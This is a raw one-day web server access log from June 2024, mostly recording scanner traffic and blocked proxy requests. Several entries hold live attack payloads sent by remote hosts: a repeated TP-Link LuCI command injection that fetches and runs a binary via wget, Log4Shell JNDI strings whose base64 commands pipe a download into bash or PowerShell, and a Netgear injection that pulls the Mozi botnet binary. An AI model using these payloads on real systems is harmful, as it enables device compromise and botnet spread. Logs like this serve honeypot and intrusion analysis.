179.43.167.219 - - [09/Jun/2024:01:42:21 +0200] "-" 400 1930 176.97.210.227 - - [09/Jun/2024:01:59:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.191.127.212 - - [09/Jun/2024:02:06:41 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:02:34:26 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [09/Jun/2024:03:05:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.127.212 - - [09/Jun/2024:03:24:56 +0200] "GET / HTTP/1.1" 200 1895 147.185.133.157 - - [09/Jun/2024:03:25:08 +0200] "GET / HTTP/1.1" 200 1895 179.60.147.13 - - [09/Jun/2024:03:39:36 +0200] "-" 400 1930 103.252.136.86 - - [09/Jun/2024:04:12:33 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [09/Jun/2024:04:51:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 65.49.1.67 - - [09/Jun/2024:04:51:17 +0200] "-" 400 1930 176.97.210.227 - - [09/Jun/2024:05:05:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 206.168.32.99 - - [09/Jun/2024:05:06:32 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [09/Jun/2024:05:06:35 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [09/Jun/2024:05:06:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.52 - - [09/Jun/2024:05:13:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.127.212 - - [09/Jun/2024:05:15:31 +0200] "GET / HTTP/1.1" 200 1895 179.60.147.13 - - [09/Jun/2024:06:02:36 +0200] "-" 400 1930 185.191.127.212 - - [09/Jun/2024:06:09:38 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [09/Jun/2024:06:29:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 35.87.0.78 - - [09/Jun/2024:06:35:39 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - 
[09/Jun/2024:06:58:50 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [09/Jun/2024:07:50:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [09/Jun/2024:07:58:37 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 176.97.210.227 - - [09/Jun/2024:08:13:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.191.127.212 - - [09/Jun/2024:08:17:20 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:08:51:51 +0200] "GET / HTTP/1.1" 200 1895 216.218.206.108 - - [09/Jun/2024:09:16:05 +0200] "GET / HTTP/1.1" 200 1895 216.218.206.68 - - [09/Jun/2024:09:16:40 +0200] "GET /favicon.ico HTTP/1.1" 404 729 216.218.206.104 - - [09/Jun/2024:09:17:11 +0200] "GET /?format=json HTTP/1.1" 200 1895 216.218.206.76 - - [09/Jun/2024:09:17:36 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 198.235.24.113 - - [09/Jun/2024:09:23:54 +0200] "GET / HTTP/1.0" 200 1895 185.191.126.213 - - [09/Jun/2024:09:49:52 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [09/Jun/2024:10:06:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 147.185.132.118 - - [09/Jun/2024:10:15:25 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:10:20:39 +0200] "GET / HTTP/1.1" 200 1895 123.175.198.152 - - [09/Jun/2024:10:45:46 +0200] "GET / HTTP/1.1" 200 1895 123.175.198.152 - - [09/Jun/2024:10:45:48 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 123.175.198.152 - - [09/Jun/2024:10:45:48 +0200] "-" 400 1930 194.169.175.33 - - [09/Jun/2024:10:59:55 +0200] "-" 400 1930 87.121.69.52 - - [09/Jun/2024:11:06:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.127.212 - - [09/Jun/2024:11:09:52 +0200] "GET / HTTP/1.1" 200 1895 221.118.241.6 - - [09/Jun/2024:11:13:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 185.191.127.212 - - [09/Jun/2024:11:32:00 +0200] "GET / 
HTTP/1.1" 200 1895 64.112.72.222 - - [09/Jun/2024:11:40:42 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 206.189.158.249 - - [09/Jun/2024:11:58:21 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804 94.156.71.233 - - [09/Jun/2024:12:18:23 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 87.121.69.27 - - [09/Jun/2024:12:34:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 180.144.61.13 - - [09/Jun/2024:12:40:15 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 185.191.127.212 - - [09/Jun/2024:12:56:57 +0200] "GET / HTTP/1.1" 200 1895 35.205.205.158 - - [09/Jun/2024:13:01:15 +0200] "GET / HTTP/1.1" 200 1895 188.166.70.97 - - [09/Jun/2024:13:18:11 +0200] "-" 400 1930 188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "-" 400 1930 188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "GET / HTTP/1.1" 200 1895 188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 188.166.70.97 - - [09/Jun/2024:13:18:12 +0200] "-" 400 1930 45.227.254.49 - - [09/Jun/2024:13:21:11 +0200] "-" 400 1930 160.153.245.83 - - [09/Jun/2024:13:22:01 +0200] "POST /?username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D&id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D&password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D HTTP/1.1" 200 1895 160.153.245.83 - - [09/Jun/2024:13:22:06 +0200] "POST 
/?username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D&id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D&password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D HTTP/1.1" 200 1895 206.168.32.96 - - [09/Jun/2024:13:33:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [09/Jun/2024:13:33:09 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [09/Jun/2024:13:33:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.191.127.212 - - [09/Jun/2024:13:39:11 +0200] "GET / HTTP/1.1" 200 1895 51.12.208.9 - - [09/Jun/2024:14:09:30 +0200] "GET / HTTP/1.1" 200 1895 171.5.160.141 - - [09/Jun/2024:14:11:04 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [09/Jun/2024:14:20:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 176.97.210.227 - - [09/Jun/2024:14:30:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.191.127.212 - - [09/Jun/2024:14:33:20 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:15:55:46 +0200] "GET / HTTP/1.1" 200 1895 93.56.205.95 - - [09/Jun/2024:15:59:43 +0200] "GET / HTTP/1.0" 200 1895 78.108.177.52 - - [09/Jun/2024:16:06:58 +0200] "GET / HTTP/1.0" 200 1895 185.191.127.212 - - [09/Jun/2024:16:16:43 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [09/Jun/2024:16:45:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.180.140.5 
- - [09/Jun/2024:16:55:10 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:17:23:09 +0200] "GET / HTTP/1.1" 200 1895 45.132.93.170 - - [09/Jun/2024:17:25:47 +0200] "GET / HTTP/1.1" 200 1895 152.32.245.170 - - [09/Jun/2024:17:31:40 +0200] "-" 400 1930 152.32.245.170 - - [09/Jun/2024:17:31:51 +0200] "GET / HTTP/1.1" 200 1895 152.32.245.170 - - [09/Jun/2024:17:32:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.245.170 - - [09/Jun/2024:17:32:10 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.245.170 - - [09/Jun/2024:17:32:11 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 206.217.128.98 - - [09/Jun/2024:17:40:06 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [09/Jun/2024:18:03:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 172.169.2.65 - - [09/Jun/2024:18:04:56 +0200] "GET /actuator/health HTTP/1.1" 404 737 87.121.69.27 - - [09/Jun/2024:18:12:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.127.212 - - [09/Jun/2024:18:52:34 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [09/Jun/2024:19:03:11 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [09/Jun/2024:19:03:14 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [09/Jun/2024:19:03:14 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.141.86.171 - - [09/Jun/2024:19:06:25 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 117.222.124.58 - - [09/Jun/2024:19:08:23 +0200] "GET / HTTP/1.1" 200 1895 94.156.71.225 - - [09/Jun/2024:19:20:08 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 176.97.210.227 - - [09/Jun/2024:19:36:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.191.127.212 - - [09/Jun/2024:19:41:01 +0200] "GET / HTTP/1.1" 200 1895 104.168.70.165 - - [09/Jun/2024:19:54:52 +0200] "GET / HTTP/1.1" 200 1895 192.241.216.46 - - [09/Jun/2024:20:02:57 +0200] "-" 400 1930 205.210.31.17 - - 
[09/Jun/2024:20:16:01 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:20:40:05 +0200] "GET / HTTP/1.1" 200 1895 103.252.136.86 - - [09/Jun/2024:20:46:12 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "-" 400 1930 139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "-" 400 1930 139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "GET / HTTP/1.1" 200 1895 139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 139.59.142.223 - - [09/Jun/2024:20:53:41 +0200] "-" 400 1930 198.235.24.197 - - [09/Jun/2024:20:57:43 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [09/Jun/2024:21:54:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.236.176.211 - - [09/Jun/2024:22:00:30 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:22:00:32 +0200] "GET / HTTP/1.1" 200 1895 176.36.148.87 - - [09/Jun/2024:22:06:52 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://176.36.148.87:32958/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 727 160.176.199.90 - - [09/Jun/2024:22:07:55 +0200] "GET / HTTP/1.0" 200 1895 165.154.138.33 - - [09/Jun/2024:22:09:16 +0200] "-" 400 1930 165.154.138.33 - - [09/Jun/2024:22:09:26 +0200] "GET / HTTP/1.1" 200 1895 165.154.138.33 - - [09/Jun/2024:22:09:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.138.33 - - [09/Jun/2024:22:09:45 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.138.33 - - [09/Jun/2024:22:09:46 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET /nmaplowercheck1717963833 HTTP/1.1" 404 742 160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "POST /sdk HTTP/1.1" 404 721 160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET / HTTP/1.0" 200 1895 160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET /HNAP1 HTTP/1.1" 404 723 160.176.199.90 - - [09/Jun/2024:22:10:37 +0200] "GET /evox/about HTTP/1.1" 404 732 160.176.199.90 - - 
[09/Jun/2024:22:10:37 +0200] "GET / HTTP/1.1" 200 1895 160.176.199.90 - - [09/Jun/2024:22:10:54 +0200] "GET / HTTP/1.0" 200 1895 160.176.199.90 - - [09/Jun/2024:22:10:54 +0200] "GET / HTTP/1.1" 200 1895 185.191.127.212 - - [09/Jun/2024:22:48:01 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [09/Jun/2024:22:50:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [09/Jun/2024:23:10:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.127.212 - - [09/Jun/2024:23:24:20 +0200] "GET / HTTP/1.1" 200 1895